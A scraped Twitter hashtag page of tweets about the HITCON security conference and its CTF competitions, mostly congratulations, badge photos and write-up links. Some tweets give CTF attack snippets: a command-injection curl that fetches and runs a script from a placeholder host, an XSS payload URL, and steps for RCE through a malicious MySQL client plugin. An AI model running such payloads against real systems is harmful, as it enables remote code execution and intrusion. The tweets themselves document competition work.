| Pretraživanje | Osvježi |
|
bookgin
@bookgin_tw
|
14. lis |
|
#hitcon GoGo PowerSQL unintended RCE solution:
1. Pollute environment variable
2. libmysqlclient will load plugin from LIBMYSQL_PLUGINS
3. But it will append annoying .so
4. Bypass by sending 512 bytes ./././ ...
5. Load the malicious plugin from /proc/self/fd/0
6. Profit 🍊
|
||
|
||
|
Paul Axe
@Paul_Axe
|
6. stu 2017. |
|
curl 'http://13.115.136.15/?url=a&filename=|curl+yourhost|sh';curl 'http://13.115.136.15/?url=file:|curl+yourhost|sh' #HITCON SSRFme writeup
|
||
|
|
||
|
vash
@vash0702
|
8. pro 2017. |
|
Many good talks in these two days! Good job #hitcon and thank u 🙏 pic.twitter.com/JNhcqS87vg
|
||
|
||
|
terjanq
@terjanq
|
14. lis |
|
My team with myself included solved all 🍊 from this year #hitcon ctf. I also managed to get the first blood on Bounty Pl33z with this unintended solution :)
http://3.114.5.202/fd.php?q=%60%7D%2b%22%2balert(1337);x=%60%7D%7B(class%20$%7By=%60
|
||
|
|
||
|
|
terjanq
@terjanq
|
14. lis |
|
This is so insane. This was a straight-forward solution for Buggy .Net from #hitcon twitter.com/irsdl/status/1… pic.twitter.com/7PPoB4XmSI
|
||
|
||
|
yuawn
@_yuawn
|
27. kol |
|
I designed a simple pwnable challenge on a MCU chip with tiny TrustZone on it for this year's #HITCON Badge Challenge. Pwn the badge for all patterns!
Badge source code, hardware designs and exploits are now released:
github.com/yuawn/HITCON-b…
|
||
|
|
||
|
berming
@ber_m1ng
|
16. lis |
|
My writeup for [HITCON 2019 CTF] One Punch Man, there's no check while unlinking chunks from small bin into tcache, hmm...
medium.com/@ktecv2000/hit…
#HITCON #HITCON_2019_CTF
|
||
|
|
||
|
|
will whang
@will_whang
|
28. srp 2018. |
|
Working on this for quite a while,
this year #HITCON 2018 Badge - Cold wallet with Secure Element! pic.twitter.com/3lggCaaHYi
|
||
|
||
|
邱柏森
@jal_tw
|
18. pro 2017. |
|
Those pictures are HITCON CTF competition environment. Using 4 rented server to host all virtual machines.
Actually, in first picture, all machine are putting on the folding hand cart during the hold competition.
#HITCON
#HITCON-CTF pic.twitter.com/invFq2Te2T
|
||
|
||
|
とある診断員
@tigerszk
|
24. kol |
|
The competition is over!Thank you for your hard work!
#HITCON pic.twitter.com/1z1OHsZP9b
|
||
|
||
|
☞ zǝuıʇɹɐɯ olqɐd ☜
@xassiz
|
22. lis 2018. |
|
Write-up for "One Line PHP Challenge" by @orange_8361, worth reading! hackmd.io/s/B1A2JIjjm #PHP #HITCON #CTF #mindblowing
|
||
|
|
||
|
KT
@koczkatamas
|
21. stu 2017. |
|
This libwww-perl vulnerability was a 0-day on #HITCON CTF (SSRF Me challenge). A CTFer reported it: github.com/libwww-perl/li…
|
||
|
|
||
|
|
とある診断員
@tigerszk
|
24. kol |
|
Mini Hardenig in HITCON CMT 2019 will start soon!
#HITCON pic.twitter.com/epsENu79qz
|
||
|
||
|
Luat Nguyen
@l4wio
|
7. pro 2017. |
|
Capture The Food @ Taipei
#HITCON CTF Final 2017 pic.twitter.com/jsXXpD3Tnu
|
||
|
||
|
|
邱柏森
@jal_tw
|
15. pro |
|
HITCON CTF 2019 Final
competition hardware equipments
How many equipment you can recognize?
#HITCON pic.twitter.com/r8vQqfy0yU
|
||
|
||
|
Payload
@R0TALE
|
14. lis |
|
This is how we got first solve in EV3-Arm
Now I and @okascmy1 hve EV3’s arm
#hitcon #hitconctf pic.twitter.com/3jnBYnUKOP
|
||
|
||
|
Balsn
@balsnctf
|
14. lis |
|
We got 2nd place in HITCON Quals 2019!
HITCON is definitely one of the best CTFs! We really learn a lot in this one. Let's give the organizers a standing ovation 👭👏.
#hitcon #ctf #hitconctf pic.twitter.com/KbS15AUAMj
|
||
|
||
|
Andrea Biondo @ 36C3
@anbiondo
|
23. lis 2018. |
|
My writeup for the "Secret Note" challenge in HITCON CTF 2018 - unfortunately I didn't have much time to play, but it was an amazing CTF! #hitcon #hitconctf abiondo.me/2018/10/23/hit…
|
||
|
|
||
|
の
@mahoyaya
|
24. kol |
|
|
||
|
||
|
David Chiang
@david942j
|
7. stu 2017. |
|
Official writeup of Real Ruby Escaping in hitcon-quals-2017
#hitconctf
#HITCON
#Ruby
#Pwn
david942j.blogspot.tw/2017/11/offici…
|
||
|
|
||
